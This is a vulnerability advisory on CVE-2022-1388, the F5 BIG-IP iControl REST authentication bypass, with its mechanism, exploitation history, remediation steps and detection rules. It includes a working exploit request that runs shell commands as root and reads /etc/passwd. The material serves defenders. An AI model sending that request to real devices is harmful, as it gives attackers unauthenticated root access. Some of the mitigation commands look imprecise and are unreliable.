CVE-2022-1388 Critical Patch Available

CVE-2022-1388: F5 BIG-IP iControl REST — Authentication Bypass to RCE

Vuln Brief Research Team · · CVSS 9.8

CVE Details

CVE ID CVE-2022-1388
CVSS Score 9.8
Severity Critical
Vendor F5
Product BIG-IP
Patch Status Available
Published February 21, 2026

Background

F5 BIG-IP is one of the most widely deployed application delivery controller and load balancer platforms, used extensively in enterprise data centres, financial institutions, government agencies, and critical infrastructure. BIG-IP devices sit in front of production application infrastructure and are trusted with traffic management, SSL termination, load balancing, and security policy enforcement. The iControl REST API is the primary programmatic management interface for BIG-IP.

CVE-2022-1388 is a CVSS 9.8 authentication bypass in the iControl REST interface. Disclosed on May 4, 2022, it allows network-adjacent attackers (and in many misconfigured deployments, internet-remote attackers) to execute arbitrary commands as root without any credentials. F5 described it as allowing an unauthenticated attacker “with network access to the BIG-IP system through the management port and/or self IP addresses” to execute commands. Mass exploitation began within days of advisory publication.

Technical Mechanism

CVE-2022-1388 is an authentication bypass that exploits a flaw in how BIG-IP’s iControl REST interface handles the X-F5-Auth-Token and Connection HTTP headers in combination with request routing.

BIG-IP’s iControl REST API is accessible at https://<mgmt_ip>/mgmt/. Requests are authenticated by validating session tokens. The vulnerability exists in the way the REST endpoint proxy handles requests that contain specific header combinations:

When a request arrives at the iControl REST interface, it passes through an Apache proxy layer before reaching the back-end REST daemon (restjavad). The bypass exploits the interaction between:

  1. The Connection header (used to indicate hop-by-hop headers)
  2. The X-F5-Auth-Token header (used for REST API authentication)

By setting Connection: X-F5-Auth-Token in the request, the Apache proxy treats the auth token header as a hop-by-hop header and strips it from the forwarded request. The back-end REST daemon then receives a request with no auth token and — in the vulnerable code — fails in a way that grants access rather than denying it.

# Exploit request bypassing authentication
POST /mgmt/tm/util/bash HTTP/1.1
Host: bigip.target.com
Connection: X-F5-Auth-Token, keep-alive
X-F5-Auth-Token: dummy_value
Authorization: Basic YWRtaW46

Content-Type: application/json
{
  "command": "run",
  "utilCmdArgs": "-c 'id; whoami; cat /etc/passwd'"
}

The /mgmt/tm/util/bash endpoint, when reached with what the back-end treats as an authenticated request, executes arbitrary shell commands as root. This is the intended functionality of the bash utility endpoint for legitimate administration — the bypass makes it available without credentials.

Real-World Exploitation Evidence

Exploitation began within 2-3 days of the May 4, 2022 advisory. CISA, FBI, and ACSC published a joint advisory specifically warning of active exploitation:

  • Mass opportunistic exploitation: Security firm Horizon3 published a detailed technical analysis and working proof-of-concept on May 9, 2022 — four days after the advisory. This precipitated a significant increase in exploitation attempts.
  • Web shell deployment: The most common post-exploitation action was deploying JSP or Bash-based web shells in the BIG-IP HTTPD web root, enabling persistent access.
  • Credential harvesting: Attackers extracted configuration files containing admin credentials, certificates, and application server credentials.
  • Ransomware staging: Evidence of BIG-IP compromises being used as persistent footholds for later ransomware deployment.
  • Cryptominer deployment: Opportunistic actors deployed cryptocurrency miners on compromised BIG-IP hardware.

Security researchers observed over 650 internet-facing BIG-IP instances actively serving web shell responses within the first two weeks after advisory publication.

Impact Assessment

Compromise of a BIG-IP device is extremely serious:

  • Root shell: The iControl REST bash endpoint executes commands as root; exploitation is immediately at maximum privilege.
  • Traffic interception: BIG-IP devices handle and terminate SSL for applications; root access allows installing a certificate/key sniffer to capture all passing traffic in plaintext.
  • Downstream application compromise: BIG-IP has direct connectivity to back-end application servers and databases; it can be used to attack these internal systems.
  • Credential access: BIG-IP configuration files contain credentials for application pools, LDAP/AD integrations, and management interfaces.
  • Network position: BIG-IP devices are typically positioned in the DMZ with access to both internet-facing and internal network segments.

Affected Versions

BIG-IP VersionAffectedFixed Version
16.1.x16.1.0 – 16.1.216.1.2.2+
15.1.x15.1.0 – 15.1.515.1.5.1+
14.1.x14.1.0 – 14.1.414.1.4.6+
13.1.x13.1.0 – 13.1.413.1.5+
12.1.xAllNo fix (EOL — upgrade required)
11.6.xAllNo fix (EOL — upgrade required)

Remediation Steps

  1. Apply F5 patches: Update BIG-IP to the fixed versions above via tmsh or the F5 downloads portal.

  2. Block iControl REST access as interim mitigation:

    • Restrict management interface access via IP allowlisting
    • Block access from self IP addresses: 
      # Via TMSH
modify sys db ui.advisory.enabled value true
create net port-lockdown management-ip-allow-list { add { 192.168.1.0/24 } }

  3. Verify no web shells exist: Check the iControl REST application directory:

    # Check for unexpected files in BIG-IP web directory
find /var/prompt /usr/share/uhttpd -name "*.php" -o -name "*.jsp" -newer /var/log/tmm

# Check for unexpected cron jobs
cat /etc/cron.d/* | grep -v "^#"

  4. Review administrator accounts: Check for unexpected admin accounts:

    tmsh list auth user

  5. Rotate all credentials: If exploitation is suspected, rotate all management credentials, certificates, and any application credentials in the configuration.

Detection Guidance

Log sources:

  • BIG-IP /var/log/restjavad.*.log
  • /var/log/httpd/ssl_request.log
  • TMOS audit log: tmsh show sys log audit

Suspicious request indicators:

  • POST requests to /mgmt/tm/util/bash without valid auth token
  • Presence of Connection: X-F5-Auth-Token in HTTP requests to management interface
  • File creation events in web root directories

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET 443 (msg:"F5 BIG-IP CVE-2022-1388 iControl Auth Bypass"; flow:established,to_server; http.uri; content:"/mgmt/tm/util/bash"; http.header_names; content:"X-F5-Auth-Token"; sid:9002138; rev:1;)

Timeline

DateEvent
May 4, 2022F5 publishes advisory; patches released
May 4, 2022CISA adds CVE-2022-1388 to KEV catalogue
May 6, 2022Multiple PoC exploits published
May 9, 2022Horizon3 publishes detailed technical analysis and full PoC
May 10, 2022Mass exploitation wave begins; hundreds of shells deployed
May 25, 2022CISA, FBI, ACSC joint advisory on active exploitation
June 2022Continued exploitation; BIG-IP compromise used in ransomware campaigns

Tags

f5bigipicontrolauthentication-bypassrceapiload-balancercisa-kev

Related Analysis

CVE-2024-1708 Critical

CVE-2024-1708: ConnectWise ScreenConnect Path Traversal — RMM Tools as Attack Vectors

ConnectWise

CVE-2026-0300 Critical

CVE-2026-0300: Palo Alto PAN-OS Out-of-Bounds Write Leads to Root RCE on Firewalls

Palo Alto Networks

CVE-2026-20182 Critical

CVE-2026-20182: Cisco Catalyst SD-WAN Authentication Bypass — Unauthenticated Admin Access

Cisco